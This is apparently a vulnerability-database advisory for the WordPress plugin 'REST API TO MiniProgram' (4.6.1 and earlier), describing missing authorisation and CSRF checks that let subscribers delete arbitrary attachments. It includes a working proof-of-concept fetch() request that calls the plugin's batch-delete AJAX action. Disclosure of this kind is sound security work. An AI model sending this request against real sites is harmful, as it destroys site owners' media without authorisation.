Lucene search
Lana CodesWPEX-ID:DE162A46-1FDB-47B9-9A61-F12A2C655A7DHistoryApr 25, 2023 - 12:00 a.m.
REST API TO MiniProgram <= 4.6.1 - Subscriber+ Attachment Deletion
2023-04-2500:00:00
Lana Codes
72
vulnerability
rest api
unauthorized deletion
miniprogram
security exploit
EPSS
0.001
Percentile
27.4%
The plugin does not have authorisation and CSRF checks in an AJAX action, allowing ay authenticated users, such as subscriber to call and delete arbitrary attachments
fetch('https://example.com/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=exopite-sof-file-batch-delete&media-ids%5B%5D=1&media-ids%5B%5D=1',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));Related
nvd
nvd
CVE-2023-0551
2023-08-16 12:15:12
cve
cve
CVE-2023-0551
2023-08-16 12:15:12
prion
prion
Cross site request forgery (csrf)
2023-08-16 12:15:00
cvelist
cvelist
wpvulndb
wpvulndb
REST API TO MiniProgram <= 4.6.1 - Subscriber+ Attachment Deletion
2023-04-25 00:00:00
wordfence
wordfence